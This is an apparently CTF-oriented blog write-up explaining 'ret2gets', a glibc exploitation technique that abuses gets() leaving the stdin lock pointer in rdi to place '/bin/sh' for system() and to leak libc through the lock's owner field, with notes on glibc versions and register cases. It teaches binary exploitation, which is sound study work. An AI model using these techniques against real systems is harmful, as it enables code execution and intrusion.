ret2gets
Who needs "pop rdi" when you have gets()
Ah the gets
function, a staple of insecure coding and overflow challenges, reading as much data as possible upto a \n
. While most people are interested in its unlimited overflow, I'm interested in its applications for rdi
control, and even libc leaks. What am I talking about you may be asking?
Well, let's go back to the demo program.
Running this under gdb
, let's enter any string, and see what happens to the registers after gets
, because as you probably know, many functions will clobber the argument variables as they have no need to preserve them, and will use them either as scratch registers, or in other function calls (or both!). For gets
, all we'd need is some writable address to land in rdi
, then perhaps we could do something?
Bingo! We have a address which appears to exist in libc's writable region, so by calling gets
again in our rop chain, we could overwrite libc data, perhaps smash some useful structures. However, without a libc leak that could be limited. There could be multiple ways to utilise this, but the one I'm most interested in here is smashing _IO_stdfile_0_lock
.
_IO_stdfile_0_lock
_IO_stdfile_0_lock
Let's not beat around the bush, glibc's IO is complicated, so much so that there's a whole category related to IO exploitation, called FSOP
. That won't be the focus here, instead we're looking at what's generally overlooked when it comes to glibc IO: locking.
Because glibc supports multithreading, many glibc functions need to be thread-safe, which means that they're resistant to data racing. This is a problem faced by glibc IO, because multiple threads can use the same FILE
structures at the same time, so if 2 threads try to use one at the same time, this is called a race condition, and it can break the FILE
. We fix this using locks.
If you've ever looked at glibc source code for IO functions (as you do), you may noticed a common pattern with a lot of them (except printf and scanf, as they're more complicated, more on those later). Let's take gets (2.35 for now):
At the start of the function it uses _IO_acquire_lock
, and at the end it uses _IO_release_lock
. The idea is that acquiring the lock tells other threads that stdin
is currently in use, and any other threads that try to access stdin
will be forced to wait until this thread releases the lock, telling other threads that stdin
is no longer in use.
For this reason, FILE
has a field _lock, which is a pointer to a _IO_lock_t (stored at offset +0x88
):
Sidenote on finding locking functions
I had some trouble finding the necessary macros and functions for acquiring and releasing locks, so I'll make a note here. I use elixir bootlin for reading and searching the glibc code base. When searching for _IO_acquire_lock
, we get multiple definitions, which isn't very helpful (same thing for _IO_release_lock
).
So which one gets used?
sysdeps/htl
: This is theHurd version
, which would be used on GNU Hurd. This isn't nearly as common asGNU Linux
, so we can ignore this one.sysdeps/generic
: Like the name suggests, this is designed to work anywhere which doesn't have a specific definition, like a fallback. This isn't used in our case.libio/libioP.h
: Seems to be another fallback, in a specific case at least, when_IO_MTSAFE_IO
isn't defined. If these were used, no locking is done at all, so this implies this is when we don't care about thread safety. In our case_IO_MTSAFE_IO
is set, so we can ignore this.
The correct one is sysdeps/nptl
, otherwise known as Native POSIX Threads Library
.
_IO_acquire_lock
/_IO_release_lock
_IO_acquire_lock
/_IO_release_lock
These macros are defined as follows:
This may look confusing, but the 2 important functions to take away from this are _IO_flockfile
and _IO_acquire_lock_fct
. The __attribute__((cleanup))
maybe look bizarre, but all it does is call _IO_acquire_lock_fct
on _fp
when the end of the artificial do-while(0)
block is over (basically at the end of the IO function). _IO_acquire_lock_fct is defined as:
So really from this, the 2 macros for locking and unlocking are _IO_flockfile and _IO_funlockfile.
_IO_USER_LOCK=0x8000
is a macro which seems to indicate whether or not the inbuilt locking should be used or not. This is usually used internally, like in helper streams in printf
for example. For our purposes we can ignore this, as this check will always pass for stdin
(or any of the standard streams for that matter). Finally we get to the macros that we care about: _IO_lock_lock
and _IO_lock_unlock
.
_IO_lock_lock
/_IO_lock_unlock
_IO_lock_lock
/_IO_lock_unlock
_IO_lock_lock and _IO_lock_unlock are defined as:
Note that _name
is the lock itself, and in the case of gets
, is _IO_stdfile_0_lock
.
Let's break this down. The owner
field stores the address of TLS
(Thread Local Storage) structure for the thread currently using the lock (if you're wondering what the TLS
structure is, it's the structure whose address is stored in the fs
register; it also stores the canary, and you've likely seen fs:[0x28]
in disassembly). So when locking, if the owner
is different to THREAD_SELF
(i.e. lock is owned by a different thread), it waits until that thread has unlocked using lll_lock
, then claims ownership of the lock. When unlocking, it removes its ownership, and signals that it's no longer in use with lll_unlock
.
The use of cnt
is a bit bizarre to me. The only way I could see this being useful is if the same thread had to use the lock multiple times, perhaps due to recursive(?) calls. Perhaps it's just a flexibility thing, I'm not sure. But what I can tell you is that this will be useful for us in a moment ;)
_IO_stdfile_0_lock
in rdi
?
_IO_stdfile_0_lock
in rdi
?You may be wondering why this happens, and while this is slightly bizarre, I can give an educated guess.
For one thing, _IO_lock_unlock
is what's called at the very end of most IO functions, including gets
, so its effects on the registers are the most recent before returning, with nothing afterwards clobbering the registers.
Above is the disassembly of _IO_lock_unlock
. rbp
stores the address of stdin
, so +182
is checking _IO_USER_LOCK
. But then look at +191
. Recall that _lock
is stored at an offset of +0x88
, so this must be loading stdin._lock
, which as we know is _IO_stdfile_0_lock
, and we see that it's loading into rdi
! Then pretty soon afterwards it returns, without clobbering rdi
(__lll_lock_wait_private
doesn't clobber it either, it's just a thin wrapper around the futex
syscall).
So that's where _IO_stdfile_0_lock
comes from, but where did it go? why does _lock
get loaded into rdi
?
That's a good question, to which my best guess would be that it's an optimization made by the compiler. In the case where lll_unlock
is called, the address of _lock
is passed directly to the futex
wrapper as the one and only argument (i.e. through the rdi
register). Therefore it loads _lock
into rdi
so that it doesn't need to use an extra assignment to prepare the call to futex
like mov rdi, [register containing _lock]
, which saves space and time.
glibc prior to 2.30
2.30
While we're mainly looking at 2.34+
, let's have a brief look at versions prior to that. It appears that prior to 2.30
, the disassembly looks a bit different. For example, the following is from 2.29
.
Instead of loading it into rdi
, it loads it into rdx
, then later into rdi
just for the futex
call? And what's going on around the call to __lll_unlock_wake_private
with rsp
? This seems like a bizarre choice for the compiler to make, and the reason for that is that this part is written in assembly. I couldn't tell you why, but what I can say is that this causes problems for us, as _lock
only gets loaded into rdi
under very specific cirumstances, which hinders our potential techniques.
Detecting this behaviour
For fun, I decided to write a python script which uses angr
that can detect this behaviour automatically, for a given libc.
The libc doesn't require debug symbols, and the script should work for 2.23-2.39
, as these were the versions I tested (2.39
is the most recent version as of writing this).
Exploit techniques
Now for the fun stuff. I'm gonna show you 2 simple techniques which can help you with your ropping, one for controlling rdi
and another for leaking libc.
I'll demonstrate these using the demo program, which is patched to run using glibc 2.35 (that'll be important later).
Controlling rdi
rdi
One idea you may have already had is that, since _IO_stdfile_0_lock
always ends up in rdi
after a call to gets
, and gets
allows us to write arbitrary data to a pointer in rdi
, then surely we can just write /bin/sh
to _IO_stdfile_lock
, right?
If you were thinking that, then good job, because you're correct, we can!
Since rdi -> _IO_stdfile_0_lock
, another call to gets
will write data there. Then we'd send /bin/sh
, and then that 2nd call to gets
will return _IO_stdfile_0_lock -> "/bin/sh"
in rdi
. This would get around needing to use pop rdi ; ret
to get a pointer to /bin/sh
, so if you had system
available, then you could get a shell!
One important thing to note is that after we overwrite the lock, _IO_lock_unlock
will be executed before we return. This will decrement cnt
, and if the new cnt
is 0
, then lll_unlock
will clobber our data! This is why it's important to overwrite cnt
to a value other than 1
, and we have to adjust that value to be +1
more than what we want. The code for this would be as follows:
While this will of course SEGFAULT
, we see our desired result of rdi -> "/bin/sh"
!
Another thing to note is that /bin/sh
will remain in _IO_stdfile_0_lock
until we change it back, so after any subequent calls to gets
, we'll get back this pointer to /bin/sh
. Because even though the locking will increment the cnt
, it will leave the rest of the contents alone, then unlocking will decrement it back.
This relies on being able to skip over lll_unlock
by having a large value for cnt
.
But for 2.29
and prior, it only loads _lock
into rdi
when calling lll_unlock
, so this won't work as rdi
won't end up pointing to _IO_stdfile_0_lock -> "/bin/sh"
.
I also found out that I'm not the first person to discover this, w3th4nds beat me to it with the challenge Sound of Silence, and I wouldn't be surprised if it's been found/used before then, I just hadn't seen it before writing this.
Leaking libc
There are a few ways you can leak libc using gets
. For one, if you have access to printf
, then you can just use the trick above to enter a format string and then call printf
.
But what if you don't have printf
, and instead have only puts
? Well fear not, because we have another trick up our sleeves: _lock.owner
.
Recall the _IO_lock_t
structure:
And also recall that owner
gets assigned the address of the TLS
structure for this thread. While it isn't immediately at the start of the lock, it's not far out of our reach, so what if we were able to pad upto to it, then call puts
. Since TLS
(at least for the main thread) is allocated relative to libc, all you'd need is the offset from TLS
to libc base.
Unfortunately this leak can cause problems depending on the kernel(?), because the TLS can be in different places on different machines, and it doesn't seem to be fixable by using the same docker.
So keep that in mind when transferring the exploit to remote.
While I suspect this is due to a kernel difference, if anyone knows exactly why, I'd love to hear it, and I could include it here as well.
There are initially a few problems with this:
All input using
gets
is terminated by a null byteowner
getsNULL
'ed when unlocking if--cnt==0
(i.e.cnt==1
)
But both of these can be solved with one input:
The main idea behind this is that we want to set cnt=0
, so that when it comes to unlocking, it will decrement count first, then check it against 0
, which fails because now cnt=0xffffffff
, due to an integer underflow. What this does is eliminate the terminating null byte from gets
, but also since the check fails, owner
doesn't get NULL
'ed, meaning we have uninterrupted padding upto owner=TLS
, meaning we can then call puts
and leak TLS
.
Adjusting for 2.37+
The above was tested on 2.35, and should work for 2.30-2.36, but 2.37 changed _IO_lock_lock and _IO_lock_unlock to:
Bit more complicated now, but the main takeaways are:
The inclusion of
SINGLE_THREAD_P
cnt
is only decremented ifcnt != 0
Seems now that cnt = 0
doesn't necessarily imply that the lock isn't being used, but rather not being used by 2+ instances.
This forces us to adjust our techniques slightly, especially for leaking libc (the controlling of rdi
, in its current state anyway hasn't been affected). This is because we can no longer cause an integer underflow to eliminate the terminating null byte, as it refuses to decrement cnt=0
.
Fortunately there is a way around this, but it will require an extra call to gets
.
So what's going on here?
The main aim of the first gets
is to do the following:
Set
lock = 0
, which marks the lock as unlocked.Fill
cnt
with junk.Clobber
owner
so thatowner != THREAD_SELF
Then on the last call to gets
, when _IO_lock_lock
is executed:
This check will fail, even if the process is single-threaded, because we set
owner
to junk, soowner != NULL
. You could do a version where this case passes if you wanted, I decided to make the technique not reliant on it being single-threaded (i.e. more versatile).This check will succeed.
Unforunately this is unavoidable, but since we set
lock = 0
, this lock is marked as unlocked, so this will just lock it (setlock = 1
).Bingo! The
owner
gets set to theTLS
structure, which is what we want to leak
Since lock = 1
, it contains null bytes which would terminate puts
, so here we need to fill lock
with junk ("CCCC"
). But what about the null byte from gets
? Just like before, the cnt
getting decremented in unlocking will help to eliminate this null byte.
p.sendline(b"CCCC")
will write a null byte into the LSB
of cnt
. In _IO_lock_unlock
, cnt
gets decremented as cnt != 0
, which converts the \x00
into \xff
, and just like before, the unlocking will leave owner
alone.
And just like that, we now have padding upto owner=TLS
.
This version of the leak will actually work before 2.37 as well, so this is the more versatile one.
What if rdi != _IO_stdfile_0_lock
?
rdi != _IO_stdfile_0_lock
?This is all pretty cool (in my opinion at least if you disagree you're wrong), but what if we were presented the following program:
Now we have a problem. While gets
would place _IO_stdfile_0_lock
into rdi
, the subequent puts
call would clobber it. Now what?
Ideally we'd want to find a way to put _IO_stdfile_0_lock
into rdi
, and fortunately there are a few tricks we can use in certain cases:
Case 1: rdi
is writable
rdi
is writableEven if it isn't _IO_stdfile_0_lock
, any writable rdi
would be a valid condidate for a gets
call, which would then put _IO_stdfile_0_lock
back into rdi
!
A common case for this is after some other IO function. Recall that most IO functions follow that locking pattern, which includes puts
. So in the above example, rdi
would be _IO_stdfile_1_lock
, which we can just call gets
on to get our beloved _IO_stdfile_0_lock
. For dealing with another IO lock, you can use p.sendline(b"\x01")
, as the expected value for lock
will be 1
(LLL_LOCK_INITIALIZER_LOCKED
).
Case 2: rdi
is readable
rdi
is readableWhile this won't make for a valid candidate for gets
, it would make a valid candidate for puts
, so call to puts
would put into Case 1
, and so you can then apply the above.
Case 3: rdi == NULL
rdi == NULL
This won't be usable in most IO functions unfortunately. But printf
isn't just another IO function, it's built different. Let's take a look shall we? Don't worry, we won't go too far ;)
Note that scanf
follows a very similar pattern, and displays the same behaviour as printf in this regard.
printf is defined as follows:
Here we see it calls __vfprintf_internal
with the first argument (i.e. rdi
) being stdout
.
Then in __vfprintf_internal we see that early on it calls ARGCHECK
The main takeaway from all of this is that ARGCHECK
forces printf
to return early if format == NULL
, meaning it won't SEGFAULT
. And since __vfprintf_internal
was called with stdout
as the first argument, we can guess that it should be preserved until returning. So, is it?
Yes it is! So now we can just use this as a writable address.
There's also a possibility here to use an FSOP
technique to get a leak. I won't go into detail here, but if you're interested here are some links:
Case 4: rdi
is junk
rdi
is junkThis is the most annoying case, as we can't even use rdi
as an address. But 2 IO functions that can help here, if you have access to them at least, are putchar
and getchar
. These are useful, as the arguments don't matter (or at least they don't need an address as the first argument), and will both return an IO lock in rdi
.
There's also a non-IO function that can be used here: rand
, which returns a pointer to unsafe_state
in rdi
across a broad range of libc versions. More details on this can be found here.
These functions can of course be applied in any of the above cases as well.
These are just a few functions which can help, there could be many more that I'm not aware of. Most of these are just some common ones which have one thing in common: they're IO functions.
If anyone has any other tricks for this, I'd be interested to know, and maybe I'll update this to include them, with credit of course :)
Last updated